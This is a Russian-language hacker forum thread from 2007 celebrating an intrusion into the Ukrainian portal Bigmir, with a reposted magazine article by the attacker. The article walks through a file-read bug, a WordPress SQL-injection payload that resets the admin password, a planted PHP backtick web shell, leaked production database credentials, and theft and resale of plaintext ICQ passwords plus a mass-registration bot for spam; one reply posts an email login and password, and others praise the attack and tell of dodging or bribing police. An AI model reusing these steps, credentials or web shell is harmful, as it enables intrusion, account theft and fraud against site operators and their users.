Краснодарский хакер взломал Бигмир

Discussion in 'Мировые новости. Обсуждения.' started by halkfild, 7 Sep 2007.

Thread Status:
Not open for further replies.
  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Бигмир вроде украиский, так что они могли подать жалобу только в СБУ, а те уже могут ее перенаправид в фсб, но у отдела К столько гемора с крупными банковскими хакерами, кардерами и прочими, что заниматься каким то пареньком котрый похекал какого-то(а бигмир это кто то и не более того) никто скорее всего не станет.
     
  2. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    мне кажется что тут все проходит намного проще.. передали дело и все человека посадили.. не обезательно же его в украину тянуть)

    тем более что работают международные соглашения(
     
    _________________________
    #22 halkfild, 9 Sep 2007
    Last edited: 10 Sep 2007
  3. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    ребят охота почитать статью про этот взлом,никто не может выложить скан с журнала?))
     
  4. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    Скан не вылажу ну завтро напечатаю её ,(есть журнал хакер с этой статьёй)
    по поводу:
    Никто ничего доказывать не будет. Вызовут в отделение, там ты им все сам докажешь. Играть в дурачка навряд ли прокатит, но стоит попробовать.
    уже прашли те времена когда играли в дурачка , это прада не катит ,с ейчас надо оперировать законом который в дальнейшем тебя при умелом оперирование вытащит из многого гомна
    П\с: сам был пару раз под следствием в Краснодаре и в Динской (кто из Кр-края знает этот район) правдо не в сфере связанной с компами :) и не разу не играл в дурачка , хотя один раз с ноутом остановили менты на 1 вокзале и начали даёбываться типа ноут спижен, так я ксазал пиши пратакол об изъятии плюс неси оборудование для сохранение мд5 хеша винтов по поводу того чтоб не произашло изменения файлов, на что мне сказали типа ты чё такой умный, помурыжили немного ,хотели снять лове но я им не дал, хотя вру дал 50 чтоб отъебались и поехал дамой
     
    1 person likes this.
  5. mindw0rk

    mindw0rk Elder - Старейшина

    Joined:
    8 Jun 2007
    Messages:
    63
    Likes Received:
    50
    Reputations:
    1
    Хех, у меня с уголовкой проблемы были только раз, когда хостера ломал. Шуму небыло, сначала прикрыли дедик, потом каким-то раком узнали номер телефона. Только позвонили, напугали и все. Уже полгода тихо.
     
    3 people like this.
  6. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    Помню когдато замутил с картоном, зарегал хостинг при пощи его , вроде пронесло не ментов не было не кого , поэтому в плане комьпьютеров с уголовкой не встречался врать не буду, но думаю при жедании и изучении закона можно отмазатся (плюс это украина как бы грамоту в добавак не вручили ;) ) но про взлом , хотел бы я у земляка поучится , взять пару уроков , ну а так он МАЛАДЕЦ !!! , восхищаюсь и горд им.
    резананс по моему большой особенно из за номеров , ну а что лицемерить сейчас большенство хакеров Icq хакеры , плохо это или хорошо не мне решать, но к познанию таинства недр осей и движков мало кто стремится и это факт, и ачат как некто другой выделяется именно в поиске истины в всестороннем изучении основ безопасности , за что ему и спасибо (пока спасибо) не останавливаясь именно нааске хакинге.
     
  7. De1eT

    De1eT пиздюк

    Joined:
    12 Aug 2004
    Messages:
    377
    Likes Received:
    71
    Reputations:
    55
    Liar у тикакой,динской хацкер :))
    вокзал 1 или 2 был ?)
     
    1 person likes this.
  8. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    2 , ехал в Пластунцы с моря.
    да и не хакер я совсем :(
     
  9. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    вот и статья с ][akepa или просто статья M4g

    Правильный подход к локализованному партнеру Icq.Com

    Здравствуй, мой юный друг! Сегодня на нашем операционном столе лежит и подрагивает всеми конечностями очень известный пациент - украинский портал Bigmir.Net (аналог нашего Рамблера в Украине). Ты спросишь, что же в нем такого особенного? Отвечу. Бигмир - локализованный партнер Icq.Com, через которого проходит привязка номерков аськи к мылу, регистрация новых уинов и другие всяческие вкусности, связанные с аськой. Стало интересней? Тогда читай дальше:)

    [Нет ничего невозможного!]

    Помнишь майский номер ][, где твой покорный слуга успешно поимел израильский ICQ WAP-шлюз tjat.com? Это было лишь начало :) Сразу после продажи красивых номерков с этого сервиса я принялся изучать локализованных партнеров Icq.Com в различных странах: nana.co.il, rambler.ru, mynet.com, abv.bg, zoznam.sk, netvigator.com, prosieben.de, atlas.cz и bigmir.net. Для чего скачал крякнутый сканер уязвимостей XSpider 7.5 (ссылку приводить не буду, ибо это незаконно, но ты можешь ее поискать сам на различных форумах, посвященных хеку) и запустил его на своем компе с указанными выше доменами для проверки оных. Спустя час, прога выдала мне первые результаты :) Жертва была найдена - украинский портал bigmir.net с PR=8 по гуглю (в России сайтов с таким пиаром всего 3).
    Сама ядовитая ссылка выглядела так:

    Очень похоже на локальный инклуд с нулл-байтом. Но, как позже выяснилось, это было далеко не так. Данная бага позволяла лишь просматривать файлы на системе, а до выполнения php-кода дело не дошло, код в самом исходнике главной странице бигмира выглядит так:

    Просмотрев некоторые системные файлы
    (например, http://www.bigmir.net/?u=../../../.....vhosts.conf%00), я решил пока отложить эту уязвимость и идти дальше.

    [Хорошие соседи]

    Как видишь, даже в таком серьезном портале уже на главной странице притаилась очень серьезная бага. Но с нее, в принципе, ничего хорошего поднять нельзя было. Поэтому следующим моим шагом было изучение сайтов, расположенных на том же сервере, что и bigmir.net, для чего я зашел на всем известный сервис IP-lookup http://domainsdb.net, вбил туда наш любимый бигмир и стал смотреть результаты.
    На самом IP-адресе бигмира других сайтов не было, а вот на его же dns я увидел пару сайтиков: http://korrespondent.net и http://ricardo.com.ua, ссылки на которые были на главной нашего портала. Немного поизучав новых пациентов, я наткнулся на их форумы (http://forum.korrespondent.net и http://ricardo.com.ua/forum). Наметанный глаз сразу узнал скрипты борды. И там и там стоял Phorum. Но чтобы начать какие-либо хеккерские действия, необходимо было узнать версию форума. Пройдя по ссылке http://forum.korrespondent.net/admin.php, я узрел надпись "version 5.1.16a". Для нее, конечно, были известные баги, но паблик сплойтов под них не существует, а ковыряться с blind sql-injection не позволяла лень. Смотри сам, небольшой PoC сплойт (работающий, конечно, после логина на форум и подстановки существующих id форума и темы):

    HTML:
    <html> 
    <body> 
    <form method=POST action="http://forum.korrespondent.net/pm.php"> 
    <input type="hidden" name="recipients[123']" value="testers"> 
    <input type="hidden" name="action" value="post" />
    <input type="text" id="subject" name="subject" size="50" value="" />
    <textarea id="message" name="message" rows="20" cols="50"></textarea>
    <input type="hidden" name="forum_id" value="1" />
    <input type="submit" name"test" value="test"> 
    <input name="preview" value=" Preview " />
    </body> 
    </html>
    Далее я совершил те же самые действия и со вторым форумом, но админки по данному адресу там не было. В итоге, ковыряясь с этими форумами, я нашел только одну интересную особенность, если пройти по ссылке http://ricardo.com.ua/forum/docs, то в окне браузера можно наблюдать следующую забавную картину:

    Но, опять же, это все была вата, нужен был более серьезный баг.

    [Истина где-то рядом]

    Выбрав в качестве своей основной жертвы http://korrespondent.net, я продолжил хождение по этому ресурсу и через несколько минут наткнулся на http://blog.korrespondent.net, на главной странице которого в самом низу было написано "Блог Блоги Korrespondent.net работает на WordPress". Увидев эту надпись, я сразу обрадовался, ведь ВордПресс крайне дырявый движок, следовало только узнать его версию, для чего я проследовал по ссылке http://blog.korrespondent.net/readme.html. На открывшейся паге гордо красовалась вторая надпись, обрадовавшая меня за последние несколько минут: "WordPress 1.5" :) Дальше я сразу пошел на http://milw0rm.com, вбил туда в поиск название движка и увидел тучу очень неплохих сплойтов, выбрал из всех "Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)", так как он был последним для ветки 1.5, запустил его и... ничего не получил :( Огорчению моему не было предела. Значит на исследуемом сайте стоял WordPress 1.5.2, для которого не было паблик сплойтов. В итоге из-за этой неудачи я забил на несколько дней на взлом бигмира.

    [ВордПресс под ударом]

    Как и следовало ожидать, наша история еще не закончилась :) Погуляв на свежем воздухе пару дней, я подумал, а почему бы самому не поискать баги в движке блога? Чем немедленно и занялся. Зашел на официальный сайт движка http://wordpress.org, зашел в архив раздела Download и скачал оттуда последнюю версию из первой ветки - 1.5.2. Установил блог на локалхосте и принялся за раскопки :) На поиск баги ушло несколько часов и пара литров пива, я копал каждый файл, мучал параметры, листал исходники... И, в итоге, мои старания были вознаграждены! Банальная скуль-инъекция присутствовала в файле ./wp-admin/user-edit.php в 69 строке

    PHP:
    $result $wpdb->query("UPDATE $wpdb->users SET user_login = '$new_user_login', user_firstname = '$new_firstname', $updatepassword user_lastname='$new_lastname', user_nickname='$new_nickname', user_icq='$new_icq', user_email='$new_email', user_url='$new_url', user_aim='$new_aim', user_msn='$new_msn', user_yim='$new_yim', user_idmode='$new_idmode', user_description = '$new_description', user_nicename = '$new_nicename' WHERE ID = $user_id");
    Итак... (трубят фанфары) у нас на операционном столе новая приватная бага WordPress, найденная твоим покорным слугой :) Для ее использования необходима регистрация на уязвимом блоге. Вообще она находится в файле wp-register.php, но на Корреспонденте была сделана общая регистрация для всех сервисов сайта, поэтому, зарегавшись и залогинившись на сайт, я прошел по ссылке http://korrespondent.net/wp-admin/user-edit.php и сохранил страничку себе на винт. Далее, открыв ее в блокноте, я нашел следующий участок html-кода:

    HTML:
    <form name="edituser" id="edituser" action="user-edit.php" method="post">
    <table width="99%"  border="0" cellspacing="2" cellpadding="3">
    и заменил его на

    HTML:
    <form name="edituser" id="edituser" action="http://blog.korrespondent.net/wp-admin/user-edit.php" method="post">
    <table width="99%"  border="0" cellspacing="2" cellpadding="3">
    Затем нашел hidden-поле с user_id и заменил его на

    HTML:
    <textarea name="user_id" rows="5" id="new_description" style="width: 99%; "></textarea>
    После всех перечисленных действий, я сохранил заряженную страницу и открыл ее в браузере.
    Теперь необходимо небольшое пояснение по найденной уязвимости: из sql-запроса видно, что при update пользовательского профиля вообще не проверяется параметр $user_id, то есть мы можем таким образом обновить профиль любого юзера, но, прежде всего, нам необходим админ. Как просто и быстро поставить админу любой свой пароль? А вот как.
    В нашей ядовитой страничке вписываем в поля с логином и паролем любые свои логин и пароль, например, tester/tester, а в бывшее hidden-поле вписываем следующее: "-99 or user_level=10/*" (естественно, без кавычек). В итоге, наш скуль-запрос получается следующим:

    PHP:
    UPDATE wp_users SET user_login 'tester'user_firstname '',user_pass=MD5('tester'), user_lastname=''user_nickname=''user_icq=''user_email=''user_url=''user_aim=''user_msn=''user_yim=''user_idmode=''user_description ''user_nicename '' WHERE ID =-99 or user_level=10/*
    Так как юзера с ID=-99 однозначно не существует в базе данных, обновятся данные лишь юзера с user_level=10, то есть данные админа :)

    [Ленивые админы]

    Став админом blog.korrespondent.net, я задумался над получением шелла на сервере. Открою по секрету: у меня есть еще одна приватная бага, найденная мной, позволяющая легко и безболезненно получать шелл из адмнок всех версий вордпресс 1.5-2.1, но хватит с тебе раскрытия предыдущего привата :) Эта уязвимость все равно мне не понадобилась, т.к. зайдя в Редактор шаблонов, я увидел, что все php-файлы в темплейт-директории открыты на запись. Теперь необходимо было тайно встроить свой шелл в один из уязвимых файлов. Быстро набросав следующий php-код:

    PHP:
    <?
    isset(
    $_GET[fuckkk]) ? print `$_GET[fuckkk]` : '';
    ?>
    я вписал его в темплейт шапки блога. То есть, зайдя по адресу http://blog.korrespondent.net, можно было видеть обычный блог, а, зайдя на http://blog.korrespondent.net/?fuckkk=[команда], можно было видеть красивый и удобный шелл :)
    А дальше я начал изучение сервера бигмир.нет. В первую очередь меня интересовала база данных бигмира. Отправившись на поиске параметров подключения к базе, я нашел файл /storage/web/htdocs/bigmir/bigmir2/config.php, в котором находились следующие строки:

    PHP:
    // production
    define('BM_DB_HOST''cbd2.sm');
    define('BM_DB_USER''bigmir');
    define('BM_DB_PASS''NacDagegWukecBi');
    Далее я закачал на сервер скрипт управления БД от RusH Security Team (http://mentat.sibintercom.ru/Nemo/dump/rst_sql.txt, на оф. сайте скрипт недоступен) и поставил его по адресу http://files.korrespondent.net/img/f...a/4/header.php. Залогинившись по полученным данным, я с минуту наблюдал долго ожидаюмую картину - все таблицы бигмира были, как на ладони :) Немного походив по ним, я нашел таблицу с юзерами в bm_global.user. Полтора миллиона регистраций, все пароли к аськам в открытом виде! Ну не чудо ли? Ты можешь наблюдать часть таблицы с пятизначными номерками на скриншоте :)

    [Что дальше?]

    Продав все 5,6,7 значные номера из базы бигмира с помощью друзей, я задумался, а что же делать дальше? Перспективы открывались огромные, во-первых, в моих руках был клиентский API партнеров icq.com (наблюдать его ты также можешь на скриншоте), во-вторых, мой шелл уже на протяжении 2-х недель никто не спалил, а в-третьих, я нашел таблицу с админами бигмира и у меня был доступ к http://admin.bigmir.net (сейчас доступ к админке возможен лишь с опеределенных ip-адресов).
    Решив действовать по пути наименьшего сопротивления, я стал изучать регу номеров. В результате в файле /storage/web/htdocs/bigmir/include/icq_ips_class.php я увидел следующую функцию:

    PHP:
    function register($password$email$nickName$firstName false$lastName false$birthDay false$sex false$country false$city false$state false)
        {
        ...
        }
    и стал ваять автореггер icq-уинов. Создал php-гейт на бигмире, где в цикле запустил указанную выше функцию, затем на том же php написал клиент к этому гейту и с помощью программы php2exe, которую ты можешь часто видеть на дисках от журнала, перевел его в экзешник. Процитирую одного из первых покупателей данной программы (kaleostra):
    Как видишь, результаты ошеломляющие :) Но этого было, как обычно, мало. За несколько часов товарищ Cash написал GUI-интерфейс на делфях с поддержкой потоков, и получилась довольно симпатичная прога, которую ты можешь наблюдать на скриншоте. За одну ночь 4 человека зарегали более полумиллиона уинов, в результате бигмир повис надолго, затем была отключена регистрация номеров, и на сервере украинского портала стали проводиться какие-то технические работы. Через день все мои бэкдор-шеллы удалили, был установлен вордпресс последней версии и изменены пароли всех адмнов бигмира. Но меня это ничуть не расстроило :) Покопавшись в слитом движке бигмира, я нашел скуль-инъекцию, с помощью которой снова получил доступ к базе данных :) Правда, через несколько часов ее перекрыли.
    В итоге, было продано очень и очень много элитнейших уинов, было зарегистрировано очень много девяток для спама (у меня самого лежит около 250k до сих пор, если будут нужны, обращайся) и, самое главное, был подорван авторитет не только локализованного партнера icq.com http://bigmir.net, но и всего AOL'а.
    На этом следует остановиться. Как видишь, даже очень крупные проекты не могут устоять перед хакерами. Стоит задуматься, какой из локализованных партнеров будет следующей жертвой безжалостного icq-хак андеграунда? ;)

    ))

    скрины
    1) /etc/passwd на главной Бигмира
    2) Админко Бигмира
    3) Админко блога
    4) Фрагмент БД с пятизнаками
    5) Работа первого автореггера

    (с) M4g
     
    _________________________
    2 people like this.
  10. ak[id]

    ak[id] Elder - Старейшина

    Joined:
    22 Jun 2007
    Messages:
    143
    Likes Received:
    95
    Reputations:
    10
    это, кто знает асю мага? надо пива попить с ним) всетаки в одном городе живем.
    upd:
    нашел.
     
    #30 ak[id], 14 Sep 2007
    Last edited: 14 Sep 2007
  11. GiZZZ

    GiZZZ Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    16
    Likes Received:
    14
    Reputations:
    1
    Сидел читал на паре:) маг, красавчег..Побольше бы таких! Респект..
     
    1 person likes this.
  12. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    есть мылко с 5-рок

    [email protected]
    asdfghjkl11
    Если вы забудете пароль, вы см

    кто заберет стукните).. юзайте как хотите)
     
    _________________________
  13. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Нет. Если уж написали заявление, то будут хоть как разбираться.
     
  14. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    Знову мою рідну Україну похекали =\
     
  15. S|\/|eliyK()T

    S|\/|eliyK()T Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    138
    Likes Received:
    58
    Reputations:
    11
    Молодец... Вывод: не стоит не когда отчаиваться... и бросать на пол пути!
     
  16. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    ы))) я тоже через вордпресс много че поломал :)
     
Loading...
Thread Status:
Not open for further replies.